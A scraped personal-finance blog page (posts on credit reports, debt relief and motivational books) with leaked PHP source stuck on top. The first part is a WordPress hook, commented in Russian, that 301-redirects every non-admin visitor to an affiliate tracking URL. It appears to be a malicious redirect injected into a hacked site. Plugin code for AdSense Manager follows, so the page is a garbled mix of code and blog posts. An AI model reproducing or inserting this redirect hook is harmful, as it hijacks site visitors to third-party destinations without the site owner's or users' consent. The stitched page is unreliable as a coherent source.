function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = '[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); if(!ADSENSEM_VERSION){die();} $_adsensem_networks['ad_adsense_classic'] = array( 'name' => 'AdSense (Classic)', 'shortname' => 'adc', 'www' => '', 'display' => false, ); /* INITIALISATION All functions in here called at startup (after other plugins have loaded, in case we need to wait for the widget-plugin). */ class Ad_AdSense_Classic extends Ad_AdSense { function Ad_AdSense_Classic(){ $this->Ad_AdSense(); } function network(){ return 'ad_adsense_classic'; } function save_settings_network() { if($_POST['adsensem-account-id']!=''){ $this->set_account_id(preg_replace('/\D/','',$_POST['adsensem-account-id'])); } $this->p['channel']=strip_tags(stripslashes($_POST['adsensem-channel'])); $this->p['adtype']=strip_tags(stripslashes($_POST['adsensem-adtype'])); $this->p['color-border']=strip_tags(stripslashes($_POST['adsensem-color-border'])); $this->p['color-title']=strip_tags(stripslashes($_POST['adsensem-color-title'])); $this->p['color-bg']=strip_tags(stripslashes($_POST['adsensem-color-bg'])); $this->p['color-text']=strip_tags(stripslashes($_POST['adsensem-color-text'])); $this->p['color-link']=strip_tags(stripslashes($_POST['adsensem-color-link'])); $this->p['uistyle']=strip_tags(stripslashes($_POST['adsensem-uistyle'])); if($_POST['adsensem-action']!='edit defaults'){ //Specific stuff for the ad/referral subtypes (cleaner) $this->save_settings_network_subtype(); } } //Processes the alternate ad options and returns correct code(complicated and needed across the adsense ads). function _render_color_code(){ $code=''; $code.= 'google_color_border = "' . $this->pd('color-border') . '"' . ";\n"; $code.= 'google_color_bg = "' . $this->pd('color-bg') . '"' . ";\n"; $code.= 'google_color_link = "' . $this->pd('color-title') . '"' . ";\n"; $code.= 'google_color_text = "' . $this->pd('color-text') . '"' . ";\n"; $code.= 'google_color_url = "' . $this->pd('color-link') . '"' . ";\n"; return $code; } function import_settings_network($code) { if(preg_match('/google_ad_channel = "(.*)"/', $code, $matches)!=0){ $_POST['adsensem-channel'] = $matches[1]; } if(preg_match('/google_color_border = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-border']=$matches[1];} if(preg_match('/google_color_bg = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-title']=$matches[1];} if(preg_match('/google_color_link = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-bg']=$matches[1];} if(preg_match('/google_color_text = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-text']=$matches[1];} if(preg_match('/google_color_url = "(.*)"/', $code, $matches)!=0){$_POST['adsensem-color-link']=$matches[1];} $this->import_settings_network_subtype($code); //$this->save_settings(); now done in the main Ad_AdSense class } function import_detect_network($code){return false;} function _form_settings_styles(){ $default=array('' => 'Use Default'); $uistyle=array('0' => 'Square corners', '6' => 'Slightly rounded corners', '10' => 'Very rounded corners'); adsensem_admin::_field_select('Corner Style','uistyle',$uistyle); } function _form_settings_ad_format(){ //Google AdSense data $default=array('' => 'Use Default'); $adtypes=$this->_var_ad_types_available(); $formats=$this->_var_ad_formats_available(); //Get permitted formats for the current network adsensem_admin::_field_select('Ad Type','adtype',$adtypes); adsensem_admin::_field_select('Format','adformat',$formats); adsensem_admin::_field_input('Channel','channel',20,'Enter multiple Channels separated by + signs.'); } //Middle function _var_forms_unit(){ return array('ad_unit');} function _var_forms_column2(){ return array('colors','styles'); } //Show network-id on AdSense Classic function admin_manage_column1(){ adsensem_admin::dbxoutput($this->_var_forms_network()); adsensem_admin::dbxoutput($this->_var_forms_unit()); adsensem_admin::dbxoutput($this->_var_forms_column1()); } } require_once('class-adsense-ad.php'); //AdSense Ad units pre-slot style require_once('class-adsense-link.php'); //AdSense Link units pre-slot style require_once('class-adsense-referral.php'); //AdSense Referral units pre-slot style ?> EliteCashBlog » Financial Advice

When we think of addiction what usually think of is the typical drinking, drugging, food – not money. In a society that worships money, wealth addiction is taboo. In this article you can read here, Sam Polk, a former hedge-fund trader who made millions discusses his obsession with never feeling like obtaining more money was enough.

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Posted by admin, filed under Financial Advice, Saving Money, Budgeting. Date: April 2, 2021, 2:39 am | No Comments »

Know what information lenders have on you.

While you’re cleaning up your debt, order copies of your credit reports, which are free, and your credit scores, which cost about $15, since the information contained in them will directly affect the interest rates you’re offered on credit cards, mortgages and other loans.

There are three major credit bureaus: Experian, Equifax, and TransUnion. Each collects information on your credit history which is culled into a credit report. From that report, a credit score is derived. That score is a quick way for lenders to assess how risky you are as a potential borrower. The higher your score, the less risk you pose to lenders, and the more likely it is that you’ll get their best available rates.

The score most commonly used by lenders is the FICO score, developed by Fair Isaac.

When lenders review your credit reports and resultant FICO scores, they take into account not only how much you owe but also how much credit you have available to you. Too much of either and they may not loan you any more money.

So when you get your reports, check for inaccuracies; the bureaus are required to investigate and correct them once you report them. Look, too, for things that may lower your credit rating, including open lines of credit you never use or accounts you thought had been closed long ago.

The bureaus may have different information about your credit history, which means your credit score can vary somewhat from bureau to bureau. So it’s important to view reports from all three.

You can get any of the bureaus’ credit reports free at and your FICO score from Then check if this is true: If you’ve been turned down for credit, employment, or housing in the past 60 days, you may receive a free credit report from all of the three credit bureaus.

Posted by admin, filed under Credit Reports, Financial Advice. Date: April 2, 2021, 2:20 am | No Comments »

If you’ve maxed out your credit cards and are getting deeper in debt, chances are you’re feeling overwhelmed. How are you ever going to pay down the debt? Now imagine hearing about a company that promises to reduce – or even erase – your debt for pennies on the dollar. That sounds like the answer to your problems, right?

The Federal Trade Commission (FTC), the nation’s consumer protection agency, says slow down, and consider how you can get out of the red without spending a whole lot of green.

Visit this link to learn more about fixing your credit card debt.

Posted by admin, filed under Debt Relief, debt settlement, Financial Advice, Saving Money, Budgeting. Date: April 2, 2021, 2:18 am | No Comments »

Johnny Moneyseed’s free step-by-step advice on how to get out of debt now. Do yourself a favor and check it out here.

You might also want to check this LINK.

Posted by admin, filed under Debt Relief, Financial Advice. Date: January 13, 2014, 8:36 pm | No Comments »

13  Jan
Financial Bondage

Do you find yourself using money as emotional bondage? If so, find out what those hidden emotions are and how to tackle financial bondage here.

Posted by admin, filed under Debt Relief, Financial Advice. Date: January 13, 2014, 8:30 pm | No Comments »

Want to know four amazing secrets to making and sticking to your money resolutions for the new year? Click here.

Posted by admin, filed under Financial Advice, Saving Money, Budgeting. Date: January 13, 2014, 8:23 pm | No Comments »

Zach Klein, co-founder of Vimeo, Svpply, and CEO of DIY elaborates the why single careers are over and on the significance of starting a business that you see nurturing for the rest of your life in this interview with Dorm Room Tycoon here.

Posted by admin, filed under Business, Each One Teach One, Financial Advice, Inspiration. Date: January 7, 2014, 11:01 pm | No Comments »

12  Nov
Rich Dad Poor Dad

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This book was absolutely one of those books that inevitably shift the course of your life regardless of your economic status. It is one of those that paint your soul with hope and colors your financial outlook with inspiration and direction. If you have never read it or did and crave the huge dose of motivation provided, click here to read the PDF copy now. Warning: It is powerful and you will be driven.

Posted by admin, filed under Financial Advice, Inspiration, Saving Money, Budgeting. Date: November 12, 2013, 2:45 am | No Comments »

Carmine Gallo shares the best advice he ever received from Chris Gardner, a homeless man turned millionaire portrayed by Will Smith in the inspiring, moving film, The Pursuit of Happyness here.

Posted by admin, filed under Financial Advice, Inspiration, Self-Improvement. Date: November 12, 2013, 2:01 am | No Comments »


Here is an informative article from the Chamber of Commerce on government grants for small businesses in 2021. Check it out here.

Posted by admin, filed under Financial Advice. Date: October 22, 2013, 10:16 pm | No Comments »

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